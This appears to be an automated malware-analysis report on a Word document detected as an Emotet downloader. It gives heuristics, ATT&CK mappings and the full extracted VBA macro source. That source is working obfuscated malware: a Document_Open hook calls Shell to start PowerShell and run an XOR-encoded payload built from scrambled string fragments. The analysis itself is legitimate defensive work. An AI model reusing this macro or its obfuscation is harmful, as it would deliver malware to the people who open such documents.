MALICIOUS
192
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7349880-0. Static analysis reveals the presence of VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, a common tactic for downloading and running further malicious content. The obfuscated nature of the VBA code suggests an effort to evade detection.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7349880-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7349880-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
zODYl = Nurdf - XwqYh / 41025 / jKNLuO - 223327908 + Hex(TWpskb) * ZQwXkj - Round(98221) ECQFzWdOfWj = vTEJwtGZPzn + VBA.Shell(AVzGGcXUcD + Chr(nzDAjD + vbKeyP + FoRuXfEEPTI) + "owers" + ErjNHiAdEtp + oAbEjchtH + TmLGnsb + ZasHTVZPfE, 9322 - 9322) NmCIJ = 2227 + qFwsDj + (96308 * CDbl(uBzluR) - lXBGHB / CSng(47093) - MjGGLd / Hex(OaiEYT) + 55366 - 91007) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_open() On Error Resume Next -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12755 bytes |
SHA-256: 347910f87200f340373ba871418a209c158194d40e79fc0d7b5ab5c7f1b3bd8a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
211 of 390 identifiers look randomly generated (e.g. 'uIffDLrSHOJ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "mQYlTssFXIz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ECQFzWdOfWj()
On Error Resume Next
oiGoYF = 59083 + OEaAfo + (52366 * CDbl(klOwA) - XcfSF / CSng(41707) - qmIWzi / Hex(sEzoaC) + 8926 - 94266)
LPQwvd = Sqr(31438)
TBBMvF = DOBJi
ksnLdI = AJEYS - djJnP / 61528 / ZXzwaB - 223327908 + Hex(DpZtM) * NmHqc - Round(28880)
dWMurl = 54941 + CLjLMw + (8567 * CDbl(ZSLAku) - GzQvsm / CSng(37664) - QNOsra / Hex(zqmGq) + 57212 - 63805)
TiEqKn = Sqr(94942)
soRzji = hjGIf
NilFub = kCicTz - DNQMTU / 27472 / DGZNwM - 223327908 + Hex(wJuSjA) * FUSYB - Round(3649)
iifhid = 94928 + ZiAOz + (87865 * CDbl(vtvTM) - vFMXa / CSng(65181) - WLZqSQ / Hex(apltXE) + 98083 - 67324)
MbYlj = Sqr(57682)
IANpV = rZzUcQ
ZJDMj = TJDvB - NIKvhO / 62996 / IBvHZ - 223327908 + Hex(nzwCw) * sHAjO - Round(7766)
DXuYN = 92568 + WlUNBw + (80725 * CDbl(GIdjdT) - lhLTFJ / CSng(83122) - zQKaIV / Hex(cTSRY) + 31338 - 1465)
odMZP = Sqr(2941)
BVbqcC = VJCjr
zODYl = Nurdf - XwqYh / 41025 / jKNLuO - 223327908 + Hex(TWpskb) * ZQwXkj - Round(98221)
ECQFzWdOfWj = vTEJwtGZPzn + VBA.Shell(AVzGGcXUcD + Chr(nzDAjD + vbKeyP + FoRuXfEEPTI) + "owers" + ErjNHiAdEtp + oAbEjchtH + TmLGnsb + ZasHTVZPfE, 9322 - 9322)
NmCIJ = 2227 + qFwsDj + (96308 * CDbl(uBzluR) - lXBGHB / CSng(47093) - MjGGLd / Hex(OaiEYT) + 55366 - 91007)
bfkDEi = Sqr(34478)
YbotI = RzFfDV
DaAfHD = sSVmMz - mCBmW / 6893 / tSJcMi - 223327908 + Hex(RVfiOi) * ldOHX - Round(77535)
lKIrC = 90146 + SbzqH + (94928 * CDbl(WAZnf) - PdnVSt / CSng(39539) - ijTNSA / Hex(rdlLMw) + 42455 - 70957)
HilYf = Sqr(85315)
Fzqjr = thBRL
OlMzI = nZJaw - sdcowa / 59672 / nbTBt - 223327908 + Hex(iNjHvw) * aEbGBk - Round(39617)
End Function
Private Sub Document_open()
On Error Resume Next
nSKFP = 85537 + pCiAt + (32822 * CDbl(AivqK) - bZhAGz / CSng(99711) - pSzwVG / Hex(JvvUc) + 31686 - 43042)
HBsbFi = Sqr(22150)
MBmBms = ftowAU
IqmsNl = wQsrA - jEYKIr / 74181 / ViRFZ - 223327908 + Hex(zOXuD) * ZpGiND - Round(45853)
mHVnnM = 22276 + swnWKr + (96032 * CDbl(wETBDR) - sjKwCu / CSng(12518) - PFjCwN / Hex(PLZMLl) + 71543 - 99250)
jziUs = Sqr(39143)
wEjZWP = wURznY
pVIdD = NJplBY - iozbV / 79888 / brFNH - 223327908 + Hex(FODPlD) * hrhpkW - Round(72212)
ECQFzWdOfWj
zQvWUY = 97357 + aAwcj + (75762 * CDbl(JrzDJ) - VfitB / CSng(59443) - DMmAi / Hex(tQuOCN) + 99269 - 18756)
akkwmn = Sqr(80005)
QWajNi = uzCwDM
zzDkb = QcStiC - Nztwt / 82132 / cwqJB - 223327908 + Hex(FtJDr) * NBnBiB - Round(34074)
iCIuiC = 61746 + TPBzo + (23181 * CDbl(vOwbK) - qMXouq / CSng(84730) - SCwkn / Hex(ktkTP) + 99289 - 14669)
URXSW = Sqr(75631)
imjTVG = MnqAtw
cDRlor = kFnMoQ - MDNBt / 78781 / ddMLd - 223327908 + Hex(sFRcT) * Oqzhw - Round(97823)
End Sub
Attribute VB_Name = "uIffDLrSHOJ"
Function ErjNHiAdEtp()
On Error Resume Next
fUWBt = Sqr(39882)
tXQRTw = WMdmL - StmujD / 49386 / FsufHv - 223327908 + Hex(OkwDTU) * cSzSKs - Round(3620)
TZpjUF = JiSOj
CuFTd = 68739 + tLtUJS + (23759 * CDbl(RkvzRz) - cjGAz / CSng(78020) - sziOl / Hex(JYfCD) + 72703 - 80220)
IKMJTQjM = "HeLL &" + "( $EnV:CoMspec" + "[4,2" + "4,25]-JOIn'')" + "(-jOI" + "n ( '112D0w61m3" + "9m" + "34j23F1" + "16S105S"
uWUOdI = Sqr(95316)
GBKqj = wJbTB - SrITW / 73090 / lJzza - 223327908 + Hex(VEiqRi) * QKOJn - Round(12524)
YQaIq = ibVqvw
iVlLDU = 14268 + firNTR + (38568 * CDbl(NshrmU) - FzFLjI / CSng(55842) - YVKzz / Hex(HHXup) + 87985 - 65260)
dYZYQHI = "116" + "j58,49m35m1" + "21S59&54D6" + "2{49{" + "55S32{116F38" + "!53S58&" + "48w" + "59j57S111,112" + "w17&6"
tvKjKI = Sqr(18449)
PUbkrk = fcBLG - vciBO / 1714 / XtcEm - 223327908 + Hex(hATuX) * uaEWwC - Round(51322)
vJNTVr = RDOAr
CMEJEk = 89126 + HPSJo + (63577 * CDbl(HcwfQ) - Kbvdb / CSng(66307) - EBUqan / Hex(DGFFD) + 23397 - 38527)
zjLiWiBjjzn = ",32!6,27&50{11" + "6&105{116&58" + "m49S35,121m59{" + "54,62m49F" + "55S32{11" + "6!7" + "S45,39F32,49" + "S5"
uYQCC = Sqr(15233)
rfIZF = GRUYh - aUSCR / 48745 / IcIui - 223327908 + Hex(NkVBm) * lbVAj - Round(36242)
zZcCB = iwSbf
HICWsX = 95779 + CIMid + (69650 * CDbl(fqGjz) - iCwQaC / CSng(48818) - jhsPbT / Hex(XidbEE) + 30620 - 80156)
RRMahVfs = "7!122S26" + "{49m32w122&3F49" + "{54S23!56F61&" + "49{58&32&111{11" + "2S36&21S4!62w0j" + "39m116,1" + "05&11" + "6{115" + "w60F32m" + "32m36&11"
ErjNHiAdEtp = IKMJTQjM + dYZYQHI + zjLiWiBjjzn + RRMahVfs
End Function
Function oAbEjchtH()
On Error Resume Next
ZfaEKZ = Sqr(86964)
cjHUTj = Nlucr - wGHQTD / 70350 / lFpoUb - 223327908 + Hex(lRnSAt) * KiHSh - Round(52776)
jTcMHj = wPtcV
cvzjjl = 49441 + sTkPi + (2104 * CDbl(rFTijX) - ofQAOL / CSng(41662) - rtjmup / Hex(lQwtmn) + 98349 - 84048)
AawmhdGff = "0D12" + "3F123F35S35,3" + "5&1" + "22!55" + ",59j58F39D49D3" + "6w32&36{38j59" + ",62S49{122F55j"
JVqdu = Sqr(60987)
zzkGRA = rJdKrJ - zsTOJ / 63492 / wVIFaE - 223327908 + Hex(mHhXzH) * rMMOPj - Round(54253)
AtWAMd = ToqVI
riSjzH = 76454 + UGJrqm + (91379 * CDbl(IAVJL) - MSnHwK / CSng(35028) - wzrzSj / Hex(bTZnD) + 60763 - 73497)
Hzvhz = "59w57D123m5" + "6S25j5{4" + "5!13&" + "2S17w98w97m123" + "m20!60D3" + "2m32D36S11" + "0F12" + "3!"
OGtZl = Sqr(2552)
POrACY = Nitrs - QczwDV / 88527 / vdZciQ - 223327908 + Hex(IYYSUL) * EuzwV - Round(90127)
KsncA = dWOlw
DicAr = 91573 + FBvmu + (5372 * CDbl(HjHAt) - FfLPRz / CSng(7354) - IlTmw / Hex(tNjLWT) + 41229 - 44553)
wXhuZ = "123,3" + "5D35w35D12" + "2m49&56!55" + "{59!57F122w"
HCEqE = Sqr(25742)
wNQIZ = kUZNr - DiTYL / 48130 / EcZjla - 223327908 + Hex(zsvuQ) * zAdok - Round(8888)
dccda = lGwVQH
UlSYU = 15452 + FKVZY + (69990 * CDbl(YFwHzz) - SAzzHQ / CSng(21173) - bCBML / Hex(TcZbN) + 46923 - 32116)
GfGwNmQldvo = "63m51,123j34!" + "96m29w1" + "09&" + "61{" + "102w1" + "09F16!12"
VRrzLj = Sqr(18595)
liRnDw = PTTon - czdZZ / 97869 / hjRzf - 223327908 + Hex(EAXOli) * aPVkBZ - Round(13665)
ziIzOW = Nknis
LIYYh = 59567 + PCsYiw + (58990 * CDbl(CEinH) - uVUZSP / CSng(26603) - OFRBzB / Hex(cFHFXV) + 93206 - 81942)
JViBY = "3w2" + "0&60S32j32" + "F36F110{" + "123"
UCLuft = Sqr(41010)
kpJSW = ijIijj - iEjQz / 36580 / dtizth - 223327908 + Hex(mPPjmn) * OLwwrL - Round(73840)
qDCIDb = UOZlhn
CMTHS = 88363 + sEiFr + (64351 * CDbl(btXAr) - rjPpbJ / CSng(22775) - IozBIQ / Hex(IQtHN) + 57864 - 95866)
JmMCjd = "&123m" + "35!35{3" + "5{122w96F59m33!" + "32&48!" + "59&59,38S122{5" + "8!49S32S123!99" + "{45,50F96&50{7{"
FSEqL = Sqr(46758)
CIwLF = qsBcGC - BQwszr / 10990 / vSoWHM - 223327908 + Hex(qkwabt) * EapijL - Round(34001)
wfuOi = zcdjZs
rKKYp = 3364 + QsBzvd + (37349 * CDbl(lRHHqQ) - zEfwJp / CSng(76182) - zMuNXA / Hex(aCKvzG) + 55939 - 94504)
LVHZzZ = "17!6" + "S123j20S60" + "D32,32S36F110w" + "12" + "3m123j57S49" + "!56w59F58j48" + "w61S39&55," + "122j55,5" + "9D1" + "22"
TAUIcB = Sqr(16774)
JYqFrS = Clthrc - RUYzCC / 58798 / jPZKV - 223327908 + Hex(bmcSQZ) * kjfXAH - Round(66464)
UzaMRo = LtUSW
pHozj = 95763 + Rfjar + (16958 * CDbl(VDPKu) - Bwpvvv / CSng(9020) - ZDGIX / Hex(OSAkAN) + 30436 - 54161)
iJDCRNU = "w32F60" + "w123S96S16D" + "102S25m56j27&12" + "3w20{60S32&3" + "2F36m110j123j" + "123!55F39{" + "58D39m49S3" + "8w34S49F38" + "{1" + "22w"
PBLrE = Sqr(92915)
DDiuq = UlwzTu - dhnjt / 70513 / mnhINj - 223327908 + Hex(NKQJtX) * WtOKIG - Round(66810)
UikLt = zkiwGz
rbfhww = 50889 + QObDdj + (77489 * CDbl(aCvwwM) - pwcMcB / CSng(95106) - KZwtE / Hex(pDJIOD) + 37183 - 16433)
PYziMu = "55m59&57D123" + "&99&31D13!34{5" + "6{39D62&61m10" + "3D123S115&122" + "!7m36" + "w56m61j3" + "2S124w115F" + "20&11" + "5!125!111m112j" + "62,2j59w60!50S2"
oAbEjchtH = AawmhdGff + Hzvhz + wXhuZ + GfGwNmQldvo + JViBY + JmMCjd + LVHZzZ + iJDCRNU + PYziMu
End Function
Function TmLGnsb()
On Error Resume Next
bdJBYY = Sqr(89386)
CNpjKl = zrTjc - sbBvrA / 31248 / vkRpSC - 223327908 + Hex(OnQlkH) * zjuQVR - Round(89172)
JRkYr = iObwTw
PWWjJ = 88167 + bhnaW + (34907 * CDbl(nZZki) - OiQYp / CSng(80600) - fwoLZ / Hex(aGXsiz) + 24384 - 52995)
dKvjLDtdH = "5m11" + "6&105&116w1" + "12m0w" + "61" + "w39" + "{3" + "4j23D122D58!"
iHucXr = Sqr(8473)
sfUzY = BrPidW - klWbI / 11714 / DtAbZa - 223327908 + Hex(hFqNO) * dVaffz - Round(53721)
jczRjB = FhXiH
cYrsj = 37065 + DCwrWG + (57677 * CDbl(Bbfwm) - EopAT / CSng(71388) - hjNGA / Hex(VLDYmw) + 21485 - 67057)
hkQjmoOrvic = "49{44&32&1" + "24w" + "101{120{11" + "6F97D96&"
vSSVfL = Sqr(62846)
CHIjc = zMhJIF - VmWOsP / 10072 / MbPcao - 223327908 + Hex(utkzAk) * WOutAn - Round(85368)
jWQhM = uWYBO
FCzfta = 94710 + TmZUP + (87704 * CDbl(OKrwLi) - WWkuNP / CSng(30631) - hpwdX / Hex(WvmFzC) + 64263 - 88847)
OvQbUohqS = "96S102D98w" + "98m" + "125&111F" + "112F36{6F57w"
AQonn = Sqr(66240)
PzzCQ = rcUBaF - dUZmdH / 38318 / YOOaC - 223327908 + Hex(OiKwJ) * PHHtT - Round(48751)
tZpMZ = wHmwbN
fsECGX = 35669 + YIEAZQ + (15640 * CDbl(wOSwt) - qnOOvw / CSng(73537) - CZWFqV / Hex(ruPZfU) + 31590 - 69958)
MtkimPwod = "54,3{61,116S105" + ",116w112" + "w49m58j" + "34j110&3"
pvbcZ = Sqr(78599)
TKiFd = rWzOMP - vJBOn / 60127 / EnVbs - 223327908 + Hex(rZXJsq) * IOdai - Round(98594)
CnFdt = EijqB
jOHqi = 67312 + NldzKC + (32695 * CDbl(PWMjTE) - RPTkU / CSng(30042) - UinIod / Hex(IRZKr) + 21830 - 36524)
puOpiw = "2S49D57m36&1" + "16w127" + "j116j115w8m1" + "15D116F127{116" + "m112j62w2j59&" + "60F50"
naJouw = Sqr(99187)
jzXrw = PLPMs - VqRaf / 12663 / rHKjTs - 223327908 + Hex(YzmIn) * uLQEY - Round(70343)
Qubwf = CiftMo
hHjoHM = 88348 + SzoVV + (12875 * CDbl(jjbjo) - qKLZv / CSng(95234) - NtdzEv / Hex(BioTVF) + 5263 - 96911)
howMfmj = "S25D11" + "6m127!116j115" + "j12" + "2!49S44w49!11" + "5w111" + "m50&" + "59!38j4" + "9S53j55{60"
QJizT = Sqr(62656)
QWvhPm = qKRat - sVZWHZ / 27441 / JfajId - 223327908 + Hex(IREWd) * ZFvUj - Round(25757)
NZHGs = ZawIj
nzHKW = 32041 + whwPZ + (12674 * CDbl(diKaN) - uBkRA / CSng(8345) - JSpbqC / Hex(zPmAun) + 40200 - 72450)
NQCbUGM = ",124" + "!112S48F29,18&" + "14j38m5!116" + "j61F58&" + "116{112,36m21m" + "4{62S0m39,"
OwPJK = Sqr(92243)
fGJUi = GlnIv - JUKmA / 53278 / oAADi - 223327908 + Hex(HHiYnD) * HltRws - Round(88873)
wpcNb = fvkLs
SCGqVB = 12281 + uhtMD + (31382 * CDbl(TPiCX) - NwUCN / CSng(10544) - wZXGM / Hex(KUSPaT) + 56759 - 9928)
XAtZE = "125,47m32!38D" + "45{47&112F17,6" + "D32&6F27{50!122" + "!16j59&3" + "5{58{56," + "59m53m48{18" + ",61" + "!56D49F124&1" + "12F48F2"
TmLGnsb = dKvjLDtdH + hkQjmoOrvic + OvQbUohqS + MtkimPwod + puOpiw + howMfmj + NQCbUGM + XAtZE
End Function
Function ZasHTVZPfE()
On Error Resume Next
UbOWfW = Sqr(19586)
THzGj = GQPHPZ - zchMuw / 23010 / TqOokw - 223327908 + Hex(XonoMT) * PWhTjI - Round(95630)
OhcSX = vlDJPh
HMfCa = 50791 + wYMAEB + (90581 * CDbl(atpIh) - aSYlLT / CSng(22812) - iPXWo / Hex(ZOOWR) + 37052 - 19606)
SWnCIvmT = "9&1" + "8m14m3" + "8j5j122!0D59D7D" + "32D3" + "8{61j58w51,12" + "4,1"
VVmUj = Sqr(18912)
uznlb = HTMBz - JwnFO / 51129 / DhFcj - 223327908 + Hex(jjTGLW) * sKTnJN - Round(17341)
KEkvW = jKkYwj
RlSwuK = 86924 + TaMaBM + (21724 * CDbl(bSDjMf) - Dobzr / CSng(57609) - QOnww / Hex(PXlwEf) + 83217 - 57596)
HUjwjvZ = "25D120&116" + ",112D36w" + "6&57{54D3!61j" + "125,111F" + "7!32F53F38&32" + "{121{4,38F59" + "m55," + "49j39D39F1" + "16j112,36!6!5" + "7j54S3D61{111&"
jCVuj = Sqr(37832)
cDSIV = IjjbDW - DSlMz / 65638 / kEvLKj - 223327908 + Hex(OKqLB) * QzdTd - Round(19025)
QRlCi = UZiPXu
GYoXG = 94113 + ioMAfz + (45614 * CDbl(izwARN) - PTZzNL / CSng(13129) - qncjmm / Hex(QCQNSb) + 9289 - 70746)
GZjzsq = "54!38&49" + "&53" + "j6" + "3m111,41!55j53" + "D32&55{60F"
bViaQb = Sqr(1463)
FmZkwD = VaNzf - wDCTd / 38839 / CRqCt - 223327908 + Hex(dStkRV) * GKNXtc - Round(33599)
thdqX = XUQRJv
ZnYIG = 95907 + vuYtPC + (99448 * CDbl(EpRipO) - CaEnc / CSng(22192) - zthQzz / Hex(aVMjXX) + 97136 - 17576)
UqkkoBN = "47" + "S35F38w61" + "m32w49m121" + "F60w59m39!32" + "S116F112,1" + "1D122!17F44&55" + "m49{36m" + "32&61" + "F59w58!1"
PZrRo = Sqr(54593)
hlEmj = PVapa - NMPNr / 46290 / YdXjL - 223327908 + Hex(IMRcY) * MXMwt - Round(18561)
KzKAdX = SfHmHw
ovXqH = 51363 + bpvbm + (11472 * CDbl(piaBCK) - UjBPSA / CSng(391) - dfOvh / Hex(RACUq) + 86736 - 67480)
zGjJlL = "22m" + "25j" + "49!39m39!" + "53w51&49" + "w1" + "11&41w41" + "'.SpLI" + "t('mSDF{j&!,w')" + " | ForeACH"
wDlaqC = Sqr(30664)
fdHRX = hYODz - kqjcci / 47829 / Ldhnt - 223327908 + Hex(RSNVLs) * SloJG - Round(68297)
BDBfc = QsVvzL
tXDXJE = 85933 + XHwtB + (78907 * CDbl(cAPWD) - WNWwvB / CSng(90989) - nQRQY / Hex(pTpmo) + 32627 - 77705)
wJNONPL = "{ [CHAr] " + "( $_ -BXoR" + " '0x54'" + ") } ))"
ZasHTVZPfE = SWnCIvmT + HUjwjvZ + GZjzsq + UqkkoBN + zGjJlL + wJNONPL
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.